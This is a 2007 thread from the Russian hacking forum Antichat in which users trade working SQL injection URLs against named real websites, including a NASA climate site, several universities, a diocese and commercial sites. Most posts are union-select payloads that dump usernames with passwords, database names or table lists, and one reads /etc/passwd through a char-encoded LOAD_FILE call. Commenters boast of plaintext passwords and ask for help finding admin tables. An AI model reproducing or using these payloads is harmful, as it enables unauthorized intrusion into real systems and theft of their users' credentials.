ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=21336)

BlackCats 13.03.2007 22:30

http://www.magicmarkerrecords.com/bandPage.php?id=-6+union+select+1,2,3,4,5,version()

Ksander 13.03.2007 22:32

climate.gsfc.nasa.gov

hekk!
Код:

http://climate.gsfc.nasa.gov/personnel/viewperson.php?id=99'+union+select+1,2,concat(fname,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+personnel+limit+2,1/*

Grey 13.03.2007 22:32

Код:

http://www.dengi-info.com/news/?nid=-1+union+select+concat(database(),char(58),user()),2,3,4,5,6/*
Что то так и не докопался до таблиц к админке.

Colkru 13.03.2007 22:37

Код:

http://www.infodirekt.se/item.php?id=-1+union+select+1,2,3,4,table_name,5,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*
Код:

http://www.climbzone.ru/galer.php?id=-1+union+select+1,concat(username,char(58),user_password),3+from+phpbb_users/*
___
Цитата:

http://www.wiihaveaproblem.com/show_article.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+INF ORMATION_SCHEMA.TABLES/*
Во таблицы масивом выводится, почаще бы так))))

XTErner 13.03.2007 23:57

Код:

http://www.kevinsdjschool.com/gallery/addcomment.php?pid=-89+union+select+1,2,3,concat(user,0x3a,pass,0x3a,id),5,6+from+users/*
Пассы в чистом виде

BlackCats 14.03.2007 00:28

http://www.bhmdiocese.org/viewapostolate.php?id=-4+union+select+1,2,version(),4

Thanat0z 14.03.2007 00:37

с этими ничего не сделал:
Код:

__http://www.sscnet.ucla.edu/issr/csup/pubs/papers/item.php?id=31+group+by+17/*
__http://www.merrimack.edu/generator.php?id=1222'
__http://www.ee.virginia.edu/profile.php?ID=8+order+by+22/*

а в этой не добрался до таблиц, и фильтрация на кавыки
Код:

__http://www.eng.wayne.edu/page.php?id=5+union+select+1,convert(version()+using+latin1),3,4,5,6/*
__http://www.eng.wayne.edu/page.php?id=5+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6/*


BlackCats 14.03.2007 00:39

http://www.trinityfoundation.org/new_article.php?id=-8+union+select+1,2,3,version(),5,6,7,8/*

n1†R0x 14.03.2007 00:43

Код:

http://www.survival-international.org/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
нужен мозг) не могу подобрать tablename

BlackCats 14.03.2007 00:44

http://www.gamingreport.com/article.php?sid=-11+union+select+1,2,3,version(),5,6,7,8,9,10,11


Время: 07:39